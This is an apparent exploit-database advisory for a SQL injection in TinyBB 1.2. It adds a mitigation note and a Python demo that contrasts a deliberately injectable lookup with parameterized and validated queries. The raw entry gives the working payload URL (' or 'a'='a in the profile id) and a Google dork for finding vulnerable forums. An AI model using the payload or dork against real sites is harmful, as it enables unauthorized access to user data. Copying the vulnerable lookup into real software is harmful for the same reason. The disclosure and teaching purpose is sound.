Vendor: TinyBB
By: Aodrulez
CVSS: 5.5 (MEDIUM)
CWE: 89 (SQL Injection)
Product Name: TinyBB
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Ubuntu 10.04
2011

TinyBB 1.2 SQLi Vulnerability

TinyBB Version 1.2 is vulnerable to SQLi. The exploit can be performed by appending ' or 'a'='a to the profile ID parameter in the URL.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in SQL queries. Additionally, using prepared statements or parameterized queries can help prevent SQL injection attacks.
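The following is an added illustration, not code from TinyBB or from the advisory author: it runs the advisory's payload, ' or 'a'='a, against a string-concatenated profile lookup and against the same lookup written with a parameterized query, so the difference the mitigation paragraph describes can be observed directly. It uses an in-memory SQLite database with constructed sample rows; the users table and its columns are assumptions for the demonstration, not TinyBB's real schema.

```python
"""
Added example (not TinyBB's code). Demonstrates why string-concatenated SQL is
injectable and why a parameterized query is not, using the payload from the
advisory. The schema and rows below are constructed for the demo and are NOT
TinyBB's actual database layout.
"""
import sqlite3

# The injection string quoted in the advisory, exactly as it appears in the URL.
PAYLOAD = "' or 'a'='a"


def make_db() -> sqlite3.Connection:
    """Constructed sample data: two user profiles in an in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [
            (1, "alice", "alice@example.invalid"),  # constructed
            (2, "bob", "bob@example.invalid"),      # constructed
        ],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, profile_id: str) -> list:
    """Vulnerable pattern: the untrusted id is pasted into the SQL text.

    With PAYLOAD the statement becomes
        SELECT username FROM users WHERE id = '' or 'a'='a'
    and the always-true 'a'='a' clause returns every row.
    """
    sql = f"SELECT username FROM users WHERE id = '{profile_id}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn: sqlite3.Connection, profile_id: str) -> list:
    """Hardened: the value travels separately from the query text.

    The driver binds the whole string as one value, so quotes inside it can
    never change the structure of the statement; PAYLOAD simply matches no row.
    """
    sql = "SELECT username FROM users WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (profile_id,))]


def lookup_validated(conn: sqlite3.Connection, profile_id: str) -> list:
    """Defence in depth: validate the input shape, then query with a parameter.

    A profile id is expected to be a positive decimal integer; anything else
    is rejected before it reaches the database at all.
    """
    if not profile_id.isdigit():
        raise ValueError("profile id must be a positive integer")
    return lookup_parameterized(conn, int(profile_id))


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, id=1     :", lookup_vulnerable(db, "1"))
    print("vulnerable, payload  :", lookup_vulnerable(db, PAYLOAD))
    print("parameterized, payload:", lookup_parameterized(db, PAYLOAD))
    try:
        lookup_validated(db, PAYLOAD)
    except ValueError as exc:
        print("validated, payload   : rejected ->", exc)
```

The same split applies in PHP, the language TinyBB is written in: building the query with string concatenation is the vulnerable form, while PDO's prepare() with a bound parameter corresponds to lookup_parameterized, and an integer check on the id parameter before the query corresponds to lookup_validated.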

Exploit-DB raw data:

+-------------------------------+
| TinyBB 1.2 SQLi Vulnerability |
+-------------------------------+



Vulnerable Web-App : TinyBB 1.2
Vulnerability      : SQL Injection.
Author             : Aodrulez.
Email              : f3arm3d3ar@gmail.com
Google-Dork        : "TinyBB 2011 all rights reserved"
Tested on          : Ubuntu 10.04

+---------+
| Exploit |
+---------+

TinyBB Version 1.2 is vulnerable to SQLi.

http://127.0.0.1/index.php?page=profile&id=' or 'a'='a


+-------------------+
| Greetz Fly Out To |
+-------------------+
 

1] Amforked()          : My Mentor.
2] The Blue Genius     : My Boss.
3] www.orchidseven.com
4] www.malcon.org